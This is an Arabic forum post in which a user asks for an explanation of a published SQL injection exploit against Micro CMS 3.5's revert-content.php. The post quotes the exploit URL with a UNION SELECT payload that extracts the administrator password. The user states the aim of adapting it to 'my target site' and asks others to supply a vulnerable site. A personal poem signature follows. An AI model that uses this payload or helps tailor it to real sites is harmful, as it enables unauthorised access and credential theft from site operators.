عرض مشاركة واحدة
قديم 10-24-2012, 05:30 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
tiger_romnci
 
الصورة الرمزية tiger_romnci
 

 

 
إحصائية العضو






tiger_romnci غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
tiger_romnci is on a distinguished road

افتراضي رجاء شرح استغلال Micro CMS 3.5 (revert-content.php)


بسم الله الرحمن الرحيم


انا كنت عملت موضوع سالت فيه عن استغلال السغرة

Micro CMS 3.5 (revert-content.php) Remote SQL Injection Vulnerability

ولكن يبدو اني قد اخطاءت في طريقة السوال

فان اقصد

شرح الاستغلال مثال


http://site.com/[micro_cms]/cms/revert-content.php?type=newest&id=1%22%20UNION%20ALL%20SE LECT%20null,null,SUBSTRING(administrators_pass,1,1 6),null,null%20FROM%20microcms_administrators/*
================================================== ================================================== ================================================== ======================================

هذا هو الاستغلال
site.com= الموقع المصاب

فماذا يقصد ب
newest=؟

او بمعني اخر كيفيتة تريكب السغرة

ارجو اضافة موقع علي الثغرة

وكافة المتغيرات بحيث استطيع فهم السغرة ووضع متغيرات موقعي المستهدف

وشكرا لكم


v[hx avp hsjyghg Micro CMS 3>5 (revert-content>php)

التوقيع

لم أفعل شئ !!!
غير أنني اعترفت بالحقيقة التي يخاف منها الجميع أنا لست بفارس أحلامك
ولم أكون لي لحظة فارس احلام حتى لقصة خيالية لا يتجرأ قارئ على المخاطرة بقرائتها
انا الذي فقدته الايام وحذفته من حساباتها
انا المعتوه بقصص التاريخ وعلى حجارة الاساطير
انا الذي صدقت بان هناك أخ وهناك حمية وهناك شئ أسمه الانسانية
انا الذي اعترفت بان لي خطية بانني ولدت بعصر يقدس الهوي

http://desmond.imageshack.us/Himg17/...ng&res=landing

 

   

رد مع اقتباس